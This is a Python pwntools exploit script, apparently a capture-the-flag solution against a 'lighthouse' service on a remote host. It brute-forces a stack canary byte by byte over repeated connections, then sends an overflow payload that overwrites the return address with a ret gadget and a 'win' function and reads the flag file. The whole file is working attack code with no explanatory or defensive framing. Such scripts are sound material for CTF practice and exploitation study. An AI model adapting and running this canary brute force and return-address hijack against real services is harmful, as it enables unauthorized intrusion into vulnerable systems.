63 lines
1.3 KiB
Python
63 lines
1.3 KiB
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
CANARY_OFF = 136
|
|
elf = context.binary = ELF('./lighthouse', checksec=False)
|
|
|
|
#p = remote('127.0.0.1',9001)
|
|
#p = remote('offsec.m0lecon.it',13575)
|
|
HOST = 'offsec.m0lecon.it'
|
|
PORT = 13535
|
|
|
|
known = b"\x00"
|
|
|
|
for i in range(7):
|
|
for bval in range(256):
|
|
guess = known + bytes([bval])
|
|
payload = b"A" * CANARY_OFF + guess
|
|
|
|
io = remote(HOST, PORT, level='error')
|
|
|
|
io.recvuntil(b'>')
|
|
io.sendline(b'1')
|
|
#print(io.recvline())
|
|
io.recvuntil(b'entry: \n')
|
|
io.send(payload)
|
|
|
|
try:
|
|
data = io.recv(timeout=0.2)
|
|
except EOFError:
|
|
data = b""
|
|
io.close()
|
|
if b"Log entry recorded. Over and out." in data:
|
|
known = guess
|
|
log.success(f"byte {i+1}: {bval:02x}")
|
|
break
|
|
|
|
canary = u64(known)
|
|
|
|
#canary = 0xaa0f007629225000
|
|
|
|
log.info(f"Canary: {canary:#x}")
|
|
|
|
|
|
io = remote(HOST, PORT, level='error')
|
|
|
|
io.recvuntil(b'>')
|
|
io.sendline(b'1')
|
|
#print(io.recvline())
|
|
io.recvuntil(b'entry: \n')
|
|
payload = flat(
|
|
b'A' * (CANARY_OFF),
|
|
p64(canary),
|
|
b'B' * 8, #rbp,
|
|
p64(0x000000000040101a), #ret
|
|
p64(0x0000000000401630), #win
|
|
)
|
|
io.send(payload)
|
|
io.sendline(b'cat /home/user/flag')
|
|
print(io.recvline())
|
|
#io.recvline()
|
|
#p.recvline()
|
|
#p.recvline()
|